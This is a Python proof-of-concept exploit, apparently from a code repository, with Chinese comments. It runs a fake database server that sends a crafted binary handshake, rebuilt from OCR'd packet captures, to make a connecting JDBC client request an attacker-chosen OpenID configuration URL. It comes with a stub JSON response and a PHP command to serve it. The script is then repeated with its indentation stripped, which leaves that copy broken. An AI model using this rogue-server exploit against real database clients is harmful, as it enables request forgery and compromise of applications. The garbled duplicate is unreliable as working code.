kaiili/poc.py

## poc.py
import struct
import asyncio

# JDBC 客户端会去请求的地址
# 最终的请求: http://127.0.0.1:1881/.well-known/openid-configuration
url = "http://127.0.0.1:1881/"


# 自动化拼接字符串
# 0x 是占位符, 大量的数据来自 OCR, 为了对齐缺少的行
def merge_strings(arr: list) -> str:
    result = ""
    for i in range(len(arr[0])):
        current = ""
        for j in range(len(arr)):
            if arr[j][i] != "0x":
                current += arr[j][i]
        result += current
    return result


# OCR 出来的流量数据,
# 预期的获取渠道是官方文档，或者通过生产环境抓包获取
# 因为（1  官方文档不好用 （2  虚拟机只有  x86 的，所以抄作业了
s_list = [
    [
        "0x",
        "000000002b024e000003",
        "20202020202020202020",
        "2020204e010001000154",
        "00f23000007918000000",
        "01000a001c0101010101",
        "0101000d003e31372e32",
        "28010000010001010000",
    ],
    [
        "0x",
        "e8000003e80078000177ff00000002",
        "2020202020202020f1004153434949",
        "0007008c310000640000fa00000f42",
        "260000fa000000fa000000fa000000",
        "010102010001010001010101020101",
        "302e30332e30392020202020202020",
        "010100000100010001000100000000",
    ],
    [
        "0x",
        "00000001ff000004be005554463136",
        "202020202020202020202020202020",
        "40000000007cff06000070000000ff",
        "7d0000007d000000fa000000fa0000",
        "0001010101010102000b0022010101",
        "202020202020202020202031372e32",
        "000000000000000101000100010000",
    ],
    [
        "0000000000000000000",
        "2020202020202020202",
        "2020202020202020202",
        "f80000000100000000b",
        "0009e70000000600000",
        "0101000101010101010",
        "302e30332e303920202",
        "0100100014000000000",
    ],
    [
        "000000000000000000000000100000",
        "020202020202020202020202020202",
        "0c0004542434449432020202020202",
        "f000000100000ffff0000080000000",
        "00600000006000003e8000fa00000f",
        "201010101010101000101010101010",
        "020202020202020202020202020202",
        "000000000008002000000000000000",
    ],
    [
        "00005ff0000000000000000000000",
        "0bf00555446382020202020202020",
        "02020202020202020202020202020",
        "08000000040000009e7000fa00000",
        "ffc00000fffb40000fa0000090001",
        "1010001010000000c000601000102",
        "0202020000e000403030203000f00",
        "00012002001010101010101010000",
    ],
]


packet_to_send = (
    bytes.fromhex("03020a0000070000")
    + struct.pack(">H", len(url) + 899)
    + bytes.fromhex(
        merge_strings(s_list)
        + "0000000000000000000000000000000000000000000000130008010101000000000000060002014900a5"
    )
    + struct.pack(">H", len(url) + 87)
    + bytes.fromhex(
        "0000000100010005010002000811140309000300040004000600210006000400050004000700040008000400090004000a000501000b000501000c000501000e0004001000060100000f"
    )
    + struct.pack(">H", len(url) + 11)
    + bytes.fromhex("000372636500")
    + struct.pack("B", len(url))
    + url.encode("ascii")
    + bytes.fromhex(
        "00a70031000000010000000d2b06010401813f0187740101090010000c00000003000000010011000c000000010000001400a70024000000010000000c2b06010401813f01877401140011000c000000010000004600a7002100000001000000092a864886f7120102020011000c000000010000002800a7001e00000001000000062b06010505020011000c000000010000004100a70025000000010000000d2b0601040181e01a04822e01040011000c000000010000001e00a70025000000010000000d2b0601040181e01a04822e01030011000c000000010000000a"
    )
)


async def handle_connection(reader, writer):
    writer.write(packet_to_send)
    await writer.drain()
    await reader.read(10)
    writer.write(packet_to_send)
    await writer.drain()
    writer.close()


# 需要搭配一个返回成功 json使用
# 我使用的 result.json + PHP快速启动一个服务, 命令如下:
# php -S 0.0.0.0:1881 result.json
async def main():
    server = await asyncio.start_server(handle_connection, "localhost", 1025)
    async with server:
        await server.serve_forever()


asyncio.run(main())

## result.json
{
"authorization_endpoint":"a",
"token_endpoint":"2"
}
	import struct
	import asyncio

	# JDBC 客户端会去请求的地址
	# 最终的请求: http://127.0.0.1:1881/.well-known/openid-configuration
	url = "http://127.0.0.1:1881/"


	# 自动化拼接字符串
	# 0x 是占位符, 大量的数据来自 OCR, 为了对齐缺少的行
	def merge_strings(arr: list) -> str:
	result = ""
	for i in range(len(arr[0])):
	current = ""
	for j in range(len(arr)):
	if arr[j][i] != "0x":
	current += arr[j][i]
	result += current
	return result


	# OCR 出来的流量数据,
	# 预期的获取渠道是官方文档，或者通过生产环境抓包获取
	# 因为（1 官方文档不好用（2 虚拟机只有 x86 的，所以抄作业了
	s_list = [
	[
	"0x",
	"000000002b024e000003",
	"20202020202020202020",
	"2020204e010001000154",
	"00f23000007918000000",
	"01000a001c0101010101",
	"0101000d003e31372e32",
	"28010000010001010000",
	],
	[
	"0x",
	"e8000003e80078000177ff00000002",
	"2020202020202020f1004153434949",
	"0007008c310000640000fa00000f42",
	"260000fa000000fa000000fa000000",
	"010102010001010001010101020101",
	"302e30332e30392020202020202020",
	"010100000100010001000100000000",
	],
	[
	"0x",
	"00000001ff000004be005554463136",
	"202020202020202020202020202020",
	"40000000007cff06000070000000ff",
	"7d0000007d000000fa000000fa0000",
	"0001010101010102000b0022010101",
	"202020202020202020202031372e32",
	"000000000000000101000100010000",
	],
	[
	"0000000000000000000",
	"2020202020202020202",
	"2020202020202020202",
	"f80000000100000000b",
	"0009e70000000600000",
	"0101000101010101010",
	"302e30332e303920202",
	"0100100014000000000",
	],
	[
	"000000000000000000000000100000",
	"020202020202020202020202020202",
	"0c0004542434449432020202020202",
	"f000000100000ffff0000080000000",
	"00600000006000003e8000fa00000f",
	"201010101010101000101010101010",
	"020202020202020202020202020202",
	"000000000008002000000000000000",
	],
	[
	"00005ff0000000000000000000000",
	"0bf00555446382020202020202020",
	"02020202020202020202020202020",
	"08000000040000009e7000fa00000",
	"ffc00000fffb40000fa0000090001",
	"1010001010000000c000601000102",
	"0202020000e000403030203000f00",
	"00012002001010101010101010000",
	],
	]


	packet_to_send = (
	bytes.fromhex("03020a0000070000")
	+ struct.pack(">H", len(url) + 899)
	+ bytes.fromhex(
	merge_strings(s_list)
	+ "0000000000000000000000000000000000000000000000130008010101000000000000060002014900a5"
	)
	+ struct.pack(">H", len(url) + 87)
	+ bytes.fromhex(
	"0000000100010005010002000811140309000300040004000600210006000400050004000700040008000400090004000a000501000b000501000c000501000e0004001000060100000f"
	)
	+ struct.pack(">H", len(url) + 11)
	+ bytes.fromhex("000372636500")
	+ struct.pack("B", len(url))
	+ url.encode("ascii")
	+ bytes.fromhex(
	"00a70031000000010000000d2b06010401813f0187740101090010000c00000003000000010011000c000000010000001400a70024000000010000000c2b06010401813f01877401140011000c000000010000004600a7002100000001000000092a864886f7120102020011000c000000010000002800a7001e00000001000000062b06010505020011000c000000010000004100a70025000000010000000d2b0601040181e01a04822e01040011000c000000010000001e00a70025000000010000000d2b0601040181e01a04822e01030011000c000000010000000a"
	)
	)


	async def handle_connection(reader, writer):
	writer.write(packet_to_send)
	await writer.drain()
	await reader.read(10)
	writer.write(packet_to_send)
	await writer.drain()
	writer.close()


	# 需要搭配一个返回成功 json使用
	# 我使用的 result.json + PHP快速启动一个服务, 命令如下:
	# php -S 0.0.0.0:1881 result.json
	async def main():
	server = await asyncio.start_server(handle_connection, "localhost", 1025)
	async with server:
	await server.serve_forever()


	asyncio.run(main())